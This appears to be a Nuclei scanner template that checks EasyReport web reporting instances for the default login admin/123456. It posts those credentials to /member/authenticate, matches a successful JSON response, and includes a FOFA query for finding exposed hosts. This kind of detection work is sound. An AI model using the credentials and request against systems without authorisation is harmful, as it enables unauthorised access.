id: easyreport-default-login

info:
  name: EasyReport - Default Login
  author: SleepingBag945
  severity: high
  classification:
    cwe-id: CWE-798
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="EasyReport-A Sample and Easy to Use Web Reporting System"
  tags: easyreport,default-login

http:
  - raw:
      - |
        POST /member/authenticate HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        account={{username}}&password={{password}}&rememberMe=false

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - 123456

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":'
          - '"detailMsg":'
          - '"data":true'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402200b9034dbed5ce41d1a4635e453292f65ba5c5a167e0fb41acff48cb31ff3712a022013e3fd95b7767d002800e09c46f1ac29db47569131d0ad77808009b3ee182be3:922c64590222798bb761d5b6d8e72950